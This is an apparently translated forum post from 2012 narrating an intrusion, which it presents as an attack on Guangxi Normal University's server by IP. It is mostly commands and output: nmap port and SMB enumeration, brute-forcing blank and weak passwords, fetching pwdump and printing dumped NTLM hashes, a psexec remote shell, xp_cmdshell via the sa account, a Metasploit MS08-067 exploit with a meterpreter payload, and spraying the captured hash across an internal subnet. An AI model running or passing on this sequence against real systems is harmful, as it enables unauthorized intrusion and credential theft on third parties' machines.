nmap+msf attack on Guangxi Normal University

Posted on 2012-12-4 12:46:42
Guangxi Normal University site: http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb    // list the SMB scan scripts
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// use the script to enumerate the account names present on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser    // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// list the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// obtain user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2
// grab the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds

C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe
// get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 202.103.242.241
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 202.103.1.12

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user' "
// log in remotely as sa and run a command
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241
// check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

root@bt:~# msfconsole
// use the MS08-067 exploit in msf to overflow the target machine

msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show options
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf  exploit(ms08_067_netapi) > show payloads
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf  exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2? [y/N]  (ctrl+z)
msf  exploit(ms08_067_netapi) > sessions -l
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// try logging in across the whole internal subnet with the usernames and the captured hash

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Attack successful, a simple msf+nmap attack.